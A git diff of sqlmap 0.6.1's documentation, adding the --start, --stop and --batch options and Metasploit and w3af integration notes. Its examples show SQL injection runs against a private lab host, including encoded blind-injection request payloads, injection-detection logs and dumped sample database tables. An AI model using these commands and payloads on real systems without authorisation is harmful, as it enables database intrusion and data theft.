diff --git a/doc/ChangeLog b/doc/ChangeLog index 66b4c6d58..e20b5e146 100644 --- a/doc/ChangeLog +++ b/doc/ChangeLog @@ -2,7 +2,7 @@ sqlmap (0.6.1-1) stable; urgency=low * Major bug fix to blind SQL injection bisection algorithm to handle an exception; - * Added a Metasploit 3 auxiliary module to run sqlmap; + * Added a Metasploit Framework 3 auxiliary module to run sqlmap; * Implemented possibility to test for and inject also on LIKE statements; * Implemented --start and --stop options to set the first and the last @@ -12,6 +12,9 @@ sqlmap (0.6.1-1) stable; urgency=low * Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes; + * Changed the order sqlmap dump table entries from column by column to + row by row. Now it also dumps entries as they are stored in the tables, + not forcing the entries' order alphabetically anymore; * Minor bug fix to correctly handle parameters' value with % character. -- Bernardo Damele A. G. Fri, 10 Oct 2008 10:00:00 +0100 diff --git a/doc/README.html b/doc/README.html index 46bde7d5f..68be60888 100644 --- a/doc/README.html +++ b/doc/README.html @@ -245,8 +245,8 @@ those that vary the HTTP response page content. On the dynamic ones sqlmap automatically tests and detects the ones affected by SQL injection. Each dynamic parameter is tested for numeric, single quoted string, double quoted -string and all of these three datatypes with zero, one and two -parenthesis to correctly detect which is the SELECT statement syntax to +string and all of these three datatypes with zero to two parenthesis +to correctly detect which is the SELECT statement syntax to perform further injections with. It is also possible to specify the parameter(s) that you want to perform tests and use for injection on.
  • Option to specify the maximum number of concurrent HTTP @@ -277,6 +277,9 @@ and resume the injection from this file in a second time.
  • Support to read options from a configuration INI file rather than specify each time all of the options on the command line. Support also to save command line options on a configuration INI file.
    • +
  • Integration with other IT security related open source projects, +Metasploit and +w3af.
  • PHP setting magic_quotes_gpc bypass by encoding every query string, between single quotes, with CHAR, or similar, database management system function.
    • @@ -292,19 +295,19 @@ It is available in various formats:

    @@ -331,7 +334,7 @@ and 
     $ python sqlmap.py -h
 
-    sqlmap/0.6.1.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
+    sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
                         and Daniele Bellucci <daniele.bellucci@gmail.com>
     
 Usage: sqlmap.py [options] {-u <URL> | -g <google dork> | -c <config file>}
@@ -379,13 +382,16 @@ Options:
     --dbs               Enumerate DBMS databases
     --tables            Enumerate DBMS database tables (opt: -D)
     --columns           Enumerate DBMS database table columns (req: -T, -D)
-    --dump              Dump DBMS database table entries (req: -T, -D opt: -C)
+    --dump              Dump DBMS database table entries (req: -T, -D opt: -C,
+                        --start, --stop)
     --dump-all          Dump all DBMS databases tables entries
     -D DB               DBMS database to enumerate
     -T TBL              DBMS database table to enumerate
     -C COL              DBMS database table column to enumerate
     -U USER             DBMS user to enumerate
     --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
+    --start=LIMITSTART  First table entry to dump
+    --stop=LIMITSTOP    Last table entry to dump
     --sql-query=QUERY   SQL SELECT query to be executed
     --sql-shell         Prompt for an interactive SQL shell
 
@@ -417,6 +423,7 @@ Options:
     -s SESSIONFILE      Save and resume all data retrieved on a session file
     -c CONFIGFILE       Load options from a configuration INI file
     --save              Save options on a configuration INI file
+    --batch             Never ask for user input, use the default behaviour

    @@ -528,7 +535,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat [hh:mm:28] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [...] [hh:mm:29] [INFO] testing MySQL @@ -537,7 +544,7 @@ Connection: close GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20 CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%207994=7994&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -555,7 +562,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat [hh:mm:32] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:32] [TRAFFIC IN] HTTP response (OK - 200): @@ -573,7 +580,7 @@ Content-Type: text/html GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20 CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%204435=4435&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:33] [TRAFFIC IN] HTTP response (OK - 200): @@ -600,7 +607,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat [hh:mm:23] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:23] [TRAFFIC IN] HTTP response (OK - 200): @@ -2042,7 +2049,8 @@ is connected to, which is always public.

    Dump database tables entries

    -

    Options: --dump, -C, -T and -D

    +

    Options: --dump, -C, -T, -D, +--start and --stop

    It is possible to dump the entries for a specific database table. This functionality depends on both -T to specify the table name @@ -2058,15 +2066,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&ca Database: test Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ -| 1 | luther | blissett | -| 2 | fluffy | bunny | -| 3 | wu | ming | ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ +| 1 | luther | blissett | +| 2 | fluffy | bunny | +| 3 | wu | ming | | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 5 | NULL | nameisnull | -+----+--------------------------------------------+-------------------+ +| 5 | NULL | nameisnull | ++----+----------------------------------------------+-------------------+

    @@ -2112,15 +2120,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&ca Database: public Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ -| 1 | luther | blissett | -| 2 | fluffy | bunny | -| 3 | wu | ming | ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ +| 1 | luther | blissett | +| 2 | fluffy | bunny | +| 3 | wu | ming | | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 5 | | nameisnull | -+----+--------------------------------------------+-------------------+ +| 5 | | nameisnull | ++----+----------------------------------------------+-------------------+ [hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/ 192.168.1.121/dump/public/users.csv' @@ -2138,6 +2146,40 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv

    +

    You can also provide the --start and/or the --stop option +to limit the dump to a range of entries.

    +

    +

      +
    • --start specifies the first entry to enumerate
      • +
    • --stop specifies the last entry to enumerate
      • +
    +

    + +

    Example on a MySQL 5.0.51 target:

    +

    +

    +
    +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" --dump \
+  -T users -D test --start 2 --stop 4
+
+Database: test
+Table: users
+[3 entries]
++----+----------------------------------------------+-------------------+
+| id | name                                         | surname           |
++----+----------------------------------------------+-------------------+
+| 2  | fluffy                                       | bunny             |
+| 3  | wu                                           | ming              |
+| 4  | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
++----+----------------------------------------------+-------------------+
+
    +
    +

    + +

    As you can see, sqlmap is very flexible: you can leave it automatically +enumerate the whole database table up to a single column of a specific +table entry.

    +

    Dump all databases tables entries

    @@ -2153,15 +2195,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&ca Database: test Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ -| 1 | luther | blissett | -| 2 | fluffy | bunny | -| 3 | wu | ming | ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ +| 1 | luther | blissett | +| 2 | fluffy | bunny | +| 3 | wu | ming | | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 5 | NULL | nameisnull | -+----+--------------------------------------------+-------------------+ +| 5 | NULL | nameisnull | ++----+----------------------------------------------+-------------------+ Database: information_schema Table: CHARACTER_SETS @@ -2246,15 +2288,15 @@ Table: spt_datatype_info_ext Database: master Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 2 | fluffy | bunny | -| 1 | luther | blisset | -| 3 | wu | ming | -| 5 | NULL | nameisnull | -+----+--------------------------------------------+-------------------+ +| 2 | fluffy | bunny | +| 1 | luther | blisset | +| 3 | wu | ming | +| 5 | NULL | nameisnull | ++----+----------------------------------------------+-------------------+ [...] @@ -3123,7 +3165,8 @@ back-end DBMS: MySQL >= 5.0.0

    Option: --save

    - +

    It is possible to save the command line options to a configuration INI +file.

    Example on a PostgreSQL 8.2.7 target:

    @@ -3231,6 +3274,53 @@ banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.

    +

    Act in non-interactive mode

    + +

    Option: --batch

    + +

    If you want sqlmap to run as a batch tool, without interacting with you in +case of a choice has to be done, you can force it by using --batch +option than letting sqlmap go for a default behaviour.

    + +

    Example on a MySQL 5.0.51 target:

    +

    +

    +
    +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_str.php?id=1&name=luther" -v 1 \
+  --batch
+
+[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
+[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
+[hh:mm:22] [INFO] GET parameter 'id' is dynamic
+[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
+[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'id'
+[hh:mm:22] [INFO] confirming unescaped numeric injection on GET parameter 'id'
+[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
+[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic
+[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic
+[hh:mm:22] [INFO] GET parameter 'name' is dynamic
+[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis
+[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name'
+[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable
+[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name'
+[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name'
+[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis
+[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go ahead:
+[0] place: GET, parameter: id, type: numeric (default)
+[1] place: GET, parameter: name, type: stringsingle
+[q] Quit
+Choice: 0
+[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode
+[...]
+back-end DBMS:  MySQL >= 5.0.0
+
    +
    +

    + +

    As you can see, sqlmap choosed automatically to injection on the first +vulnerable parameter which is the default behaviour.

    + +

    6. Disclaimer

    sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY diff --git a/doc/README.pdf b/doc/README.pdf index 99e90c9a6..ed2cc1659 100644 Binary files a/doc/README.pdf and b/doc/README.pdf differ diff --git a/doc/README.sgml b/doc/README.sgml index 05e02a408..4c760fc18 100644 --- a/doc/README.sgml +++ b/doc/README.sgml @@ -207,8 +207,8 @@ those that vary the HTTP response page content. On the dynamic ones sqlmap automatically tests and detects the ones affected by SQL injection. Each dynamic parameter is tested for numeric, single quoted string, double quoted -string and all of these three datatypes with zero, one and two -parenthesis to correctly detect which is the SELECT statement syntax to +string and all of these three datatypes with zero to two parenthesis +to correctly detect which is the SELECT statement syntax to perform further injections with. It is also possible to specify the parameter(s) that you want to perform tests and use for injection on. Option to specify the maximum number of concurrent HTTP @@ -239,6 +239,9 @@ and resume the injection from this file in a second time. Support to read options from a configuration INI file rather than specify each time all of the options on the command line. Support also to save command line options on a configuration INI file. +Integration with other IT security related open source projects, + and . PHP setting magic_quotes_gpc bypass by encoding every query string, between single quotes, with CHAR, or similar, database management system function. @@ -254,19 +257,19 @@ name="SourceForge File List page">. It is available in various formats: - operating system independent. - operating system independent. - operating system independent. - architecture independent for Debian and any other Debian derivated GNU/Linux distribution. - architecture independent for Fedora and any other operating system that can install RPM packages. - that does not require the Python interpreter to be installed on the operating system. @@ -294,7 +297,7 @@ and . $ python sqlmap.py -h - sqlmap/0.6.1.1 coded by Bernardo Damele A. G. + sqlmap/0.6.1 coded by Bernardo Damele A. G. and Daniele Bellucci Usage: sqlmap.py [options] {-u | -g | -c } @@ -342,13 +345,16 @@ Options: --dbs Enumerate DBMS databases --tables Enumerate DBMS database tables (opt: -D) --columns Enumerate DBMS database table columns (req: -T, -D) - --dump Dump DBMS database table entries (req: -T, -D opt: -C) + --dump Dump DBMS database table entries (req: -T, -D opt: -C, + --start, --stop) --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables + --start=LIMITSTART First table entry to dump + --stop=LIMITSTOP Last table entry to dump --sql-query=QUERY SQL SELECT query to be executed --sql-shell Prompt for an interactive SQL shell @@ -380,6 +386,7 @@ Options: -s SESSIONFILE Save and resume all data retrieved on a session file -c CONFIGFILE Load options from a configuration INI file --save Save options on a configuration INI file + --batch Never ask for user input, use the default behaviour @@ -486,7 +493,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat [hh:mm:28] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [...] [hh:mm:29] [INFO] testing MySQL @@ -495,7 +502,7 @@ Connection: close GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20 CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%207994=7994&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -511,7 +518,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat [hh:mm:32] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:32] [TRAFFIC IN] HTTP response (OK - 200): @@ -529,7 +536,7 @@ Content-Type: text/html GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20 CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%204435=4435&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:33] [TRAFFIC IN] HTTP response (OK - 200): @@ -554,7 +561,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat [hh:mm:23] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:23] [TRAFFIC IN] HTTP response (OK - 200): @@ -1977,7 +1984,8 @@ is connected to, which is always public. Dump database tables entries

    -Options: --dump, -C, -T and -D +Options: --dump, -C, -T, -D, +--start and --stop

    It is possible to dump the entries for a specific database table. @@ -1994,15 +2002,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&ca Database: test Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ -| 1 | luther | blissett | -| 2 | fluffy | bunny | -| 3 | wu | ming | ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ +| 1 | luther | blissett | +| 2 | fluffy | bunny | +| 3 | wu | ming | | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 5 | NULL | nameisnull | -+----+--------------------------------------------+-------------------+ +| 5 | NULL | nameisnull | ++----+----------------------------------------------+-------------------+

    @@ -2046,15 +2054,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&ca Database: public Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ -| 1 | luther | blissett | -| 2 | fluffy | bunny | -| 3 | wu | ming | ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ +| 1 | luther | blissett | +| 2 | fluffy | bunny | +| 3 | wu | ming | | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 5 | | nameisnull | -+----+--------------------------------------------+-------------------+ +| 5 | | nameisnull | ++----+----------------------------------------------+-------------------+ [hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/ 192.168.1.121/dump/public/users.csv' @@ -2070,6 +2078,39 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv "5","","nameisnull" +

    +You can also provide the --start and/or the --stop option +to limit the dump to a range of entries. + + +--start specifies the first entry to enumerate +--stop specifies the last entry to enumerate + + +

    +Example on a MySQL 5.0.51 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" --dump \ + -T users -D test --start 2 --stop 4 + +Database: test +Table: users +[3 entries] ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ +| 2 | fluffy | bunny | +| 3 | wu | ming | +| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | ++----+----------------------------------------------+-------------------+ + + +

    +As you can see, sqlmap is very flexible: you can leave it automatically +enumerate the whole database table up to a single column of a specific +table entry. + Dump all databases tables entries @@ -2087,15 +2128,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&ca Database: test Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ -| 1 | luther | blissett | -| 2 | fluffy | bunny | -| 3 | wu | ming | ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ +| 1 | luther | blissett | +| 2 | fluffy | bunny | +| 3 | wu | ming | | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 5 | NULL | nameisnull | -+----+--------------------------------------------+-------------------+ +| 5 | NULL | nameisnull | ++----+----------------------------------------------+-------------------+ Database: information_schema Table: CHARACTER_SETS @@ -2179,15 +2220,15 @@ Table: spt_datatype_info_ext Database: master Table: users [5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ ++----+----------------------------------------------+-------------------+ +| id | name | surname | ++----+----------------------------------------------+-------------------+ | 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header | -| 2 | fluffy | bunny | -| 1 | luther | blisset | -| 3 | wu | ming | -| 5 | NULL | nameisnull | -+----+--------------------------------------------+-------------------+ +| 2 | fluffy | bunny | +| 1 | luther | blisset | +| 3 | wu | ming | +| 5 | NULL | nameisnull | ++----+----------------------------------------------+-------------------+ [...] @@ -3039,6 +3080,8 @@ back-end DBMS: MySQL >= 5.0.0 Option: --save

    +It is possible to save the command line options to a configuration INI +file.

    Example on a PostgreSQL 8.2.7 target: @@ -3140,6 +3183,54 @@ banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2. +Act in non-interactive mode + +

    +Option: --batch + +

    +If you want sqlmap to run as a batch tool, without interacting with you in +case of a choice has to be done, you can force it by using --batch +option than letting sqlmap go for a default behaviour. + +

    +Example on a MySQL 5.0.51 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_str.php?id=1&name=luther" -v 1 \ + --batch + +[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic +[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic +[hh:mm:22] [INFO] GET parameter 'id' is dynamic +[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis +[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'id' +[hh:mm:22] [INFO] confirming unescaped numeric injection on GET parameter 'id' +[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis +[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic +[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic +[hh:mm:22] [INFO] GET parameter 'name' is dynamic +[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis +[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name' +[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable +[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name' +[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name' +[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis +[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go ahead: +[0] place: GET, parameter: id, type: numeric (default) +[1] place: GET, parameter: name, type: stringsingle +[q] Quit +Choice: 0 +[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode +[...] +back-end DBMS: MySQL >= 5.0.0 + + +

    +As you can see, sqlmap choosed automatically to injection on the first +vulnerable parameter which is the default behaviour. + + Disclaimer

    diff --git a/doc/THANKS b/doc/THANKS index c5eac46ac..9b5fcdc97 100644 --- a/doc/THANKS +++ b/doc/THANKS @@ -87,12 +87,12 @@ M Simkin Alessandro Tanasi for extensively beta-testing sqlmap - for suggesting many features and reporting some minor bugs + for suggesting many features and reporting some bugs Efrain Torres for helping me out to improve the Metasploit Framework 3 sqlmap - auxiliary module and the integration with Metasploit WMAP framework - for his great Metasploit WMAP framework + auxiliary module and the integration with Metasploit WMAP Framework + for his great Metasploit WMAP Framework Sandro Tosi for helping to create sqlmap Debian package correctly diff --git a/extra/msfauxmod/README b/extra/msfauxmod/README.txt similarity index 92% rename from extra/msfauxmod/README rename to extra/msfauxmod/README.txt index b37865b27..71293e6d8 100644 --- a/extra/msfauxmod/README +++ b/extra/msfauxmod/README.txt @@ -1,5 +1,11 @@ To use Metasploit's sqlmap auxiliary module launch msfconsole and follow -the example below: +the example below. + +Note that if you are willing to run Metasploit's sqlmap auxiliary module on +Metasploit Framework 3.0 or 3.1 you first need to copy wmap_sqlmap.rb to +your /modules/auxiliary/scanner/http/ folder then launch +msfconsole because this module has been officially integrated in Metasploit +from the release 3.2. $ ./msfconsole